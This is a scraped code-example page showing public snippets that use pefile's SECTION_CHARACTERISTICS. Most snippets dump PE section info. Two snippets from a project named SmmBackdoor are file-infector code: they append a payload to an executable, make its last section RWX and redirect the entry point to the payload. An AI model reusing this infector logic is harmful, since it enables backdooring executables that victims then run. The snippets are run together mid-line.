How to use the pefile.SECTION_CHARACTERISTICS function in pefile
To help you get started, we’ve selected a few pefile examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
Cr4sh / SmmBackdoor / SmmBackdoor.py View on Github 
print('Original image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)
# write updated _INFECTOR_CONFIG back to the payload image
data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old)
# set new entry point of target image
pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new
# update last section size
last_section.SizeOfRawData += len(data)
last_section.Misc_VirtualSize = last_section.SizeOfRawData
# make it executable
last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']
print('Characteristics of %s section was changed to RWX' % last_section.Name.split('\0')[0])
# update image headers
pe_src.OPTIONAL_HEADER.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
pe_src.DOS_HEADER.e_res = INFECTOR_SIGN
print('New entry point RVA is 0x%.8x' % pe_src.OPTIONAL_HEADER.AddressOfEntryPoint)
print('New %s virtual size is 0x%.8x' % \
(last_section.Name.split('\0')[0], last_section.Misc_VirtualSize))
print('New image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)
# get infected image data
data = pe_src.write() + data"Virtual Size",
"Entropy",
"Hash")
for section in target.pe.sections:
sdata += " {:10}".format(section.Name.strip('\0'))
sdata += "{:12}".format("{0:#0{1}x}".format(section.SizeOfRawData, 10))
sdata += "{:18}".format("{0:#0{1}x}".format(section.PointerToRawData, 10))
sdata += "{:20}".format("{0:#0{1}x}".format(section.VirtualAddress, 10))
sdata += "{:20}".format("{0:#0{1}x}".format(section.Misc_VirtualSize, 10))
sdata += "{:<20}".format(section.get_entropy())
sdata += "{:<20}".format(hashlib.md5(section.get_data()).hexdigest())
sdata += "\n"
else:
cflags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
sdata = '\n ---- Detailed Section Info ---- \n\n'
for section in target.pe.sections:
sdata += " {:10}\n".format(section.Name.strip('\0'))
sdata += " {:24} {:>10}\n".format("|-Entropy:", section.get_entropy())
sdata += " {:24} {:>10}\n".format("|-MD5 Hash:", hashlib.md5(section.get_data()).hexdigest())
sdata += " {:24} {:>10} ({:})\n".format("|-Raw Data Size:", "{0:#0{1}x}".format(section.SizeOfRawData, 10),
section.SizeOfRawData)
sdata += " {:24} {:>10}\n".format("|-Raw Data Pointer:", "{0:#0{1}x}".format(section.PointerToRawData, 10))
sdata += " {:24} {:>10}\n".format("|-Virtual Address:", "{0:#0{1}x}".format(section.VirtualAddress, 10))
sdata += " {:24} {:>10} ({:})\n".format("|-Virtual Size:", "{0:#0{1}x}".format(section.Misc_VirtualSize, 10),
section.Misc_VirtualSize)
sdata += " {:24} {:>10}\n".format("|-Characteristics:", "{0:#0{1}x}".format(section.Characteristics, 10))
for flag in cflags:
if getattr(section, flag[0]):
sdata += " {:24}{:>5}{:<24}\n".format('|', '|-', str(flag[0]))sdata += "\n"
# Check for overlay
if overlay > 0:
overlay_size = target.filesize - overlay
sdata += " {:12}".format('.overlay')
sdata += "{:12}".format("{0:#0{1}x}".format(overlay_size, 10))
sdata += "{:18}".format(hex(overlay))
sdata += "{:20}".format('0x00000000')
sdata += "{:20}".format('0x00000000')
sdata += "{:<20}".format('0')
sdata += "{:<20}".format('N/A')
sdata += "\n"
else:
cflags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
sdata = '\n ---- Detailed Section Info ---- \n\n'
for section in target.pe.sections:
sdata += " {:10}\n".format(section.Name.strip('\0'))
sdata += " {:24} {:>10}\n".format("|-Entropy:", section.get_entropy())
sdata += " {:24} {:>10}\n".format("|-MD5 Hash:", hashlib.md5(section.get_data()).hexdigest())
sdata += " {:24} {:>10} ({:})\n".format("|-Raw Data Size:", "{0:#0{1}x}".format(section.SizeOfRawData, 10),
section.SizeOfRawData)
sdata += " {:24} {:>10}\n".format("|-Raw Data Pointer:", "{0:#0{1}x}".format(section.PointerToRawData, 10))
sdata += " {:24} {:>10}\n".format("|-Virtual Address:", "{0:#0{1}x}".format(section.VirtualAddress, 10))
sdata += " {:24} {:>10} ({:})\n".format("|-Virtual Size:", "{0:#0{1}x}".format(section.Misc_VirtualSize, 10),
section.Misc_VirtualSize)
sdata += " {:24} {:>10}\n".format("|-Characteristics:", "{0:#0{1}x}".format(section.Characteristics, 10))
for flag in cflags:
if getattr(section, flag[0]):
sdata += " {:24}{:>5}{:<24}\n".format('|', '|-', str(flag[0])) @staticmethod
def _dump_section_headers(pe):
"""
Small internal function to dump the section headers in a table.
Returns a string to do so.
"""
section_string = ''
section_flags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
section_string += '\nNumber of Sections: %d\n' % pe.FILE_HEADER.NumberOfSections
section_string += '{0:15} {1:8} {2:40}\n'.format('Section Name', 'Entropy', 'Flags')
section_string += '-'*65 + '\n'
for section in pe.sections:
# thanks to the pefile example code for this
flags = []
for flag in section_flags:
if getattr(section, flag[0]):
flags.append(flag[0])
# the following line was taken from Didier Steven's pecheck.py code
section_string += '{0:15} {1:<8.5} {2:40}\n'.format(''.join(filter(lambda c:c != '\0', str(section.Name))), \
section.get_entropy(),
', '.join(flags))
section_string += '\n'
return section_stringsymbolfilename = sys.argv[2]
outputfilename = sys.argv[3]
image_base = None
sections = []
symbols = []
pe = pefile.PE(pefilename)
#print(pe.dump_info())
image_base = pe.OPTIONAL_HEADER.ImageBase
for section in pe.sections:
offset = section.VirtualAddress
length = section.SizeOfRawData
name = section.Name.strip('\x00')
kind = section.Characteristics
if section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_CNT_CODE']:
kind = "CODE"
else:
kind = "DATA"
sections.append(Section(offset, length, name, kind))
section = Section(0x0, sections[0].offset, "HEADER", "DATA")
sections.insert(1, section)
file = open(symbolfilename, "r")
for line in file.readlines():
### Section
### Does not work as IDA output is broken. Get from the PE directly instead.
# m = re.match("^\s*([0-9A-Fa-f]+):([0-9A-Fa-f]+)\s+([0-9A-Fa-f]+)H\s+([^s]*)\s+(CODE|DATA)\s*$", line)
# if m:
# sec = m.group(1)# save original entry point address of target image
conf_ep_old = pe_src.OPTIONAL_HEADER.AddressOfEntryPoint
# write updated _INFECTOR_CONFIG back to the payload image
data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old, 0, conf_base)
# set new entry point of target image
pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new
# update last section size
last_section.SizeOfRawData += len(data)
last_section.Misc_VirtualSize = last_section.SizeOfRawData
# make it executable
last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']
# update image headers
pe_src.OPTIONAL_HEADER.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
pe_src.DOS_HEADER.e_res = INFECTOR_SIGN
# get infected image data
data = pe_src.write() + data
if dst is not None:
with open(dst, 'wb') as fd:
# save infected image to the file
fd.write(data)
Popular pefile functions
- pefile.BaseRelocationData
- pefile.DataContainer
- pefile.DIRECTORY_ENTRY
- pefile.get_sublang_name_for_lang
- pefile.IMAGE_CHARACTERISTICS
- pefile.LANG
- pefile.LANG.get
- pefile.MACHINE_TYPE
- pefile.MACHINE_TYPE.get
- pefile.OPTIONAL_HEADER_MAGIC_PE
- pefile.OPTIONAL_HEADER_MAGIC_PE_PLUS
- pefile.PE
- pefile.PEFormatError
- pefile.RelocationData
- pefile.RESOURCE_TYPE
- pefile.RESOURCE_TYPE.get
- pefile.retrieve_flags
- pefile.SECTION_CHARACTERISTICS
- pefile.Structure
- pefile.SUBSYSTEM_TYPE.get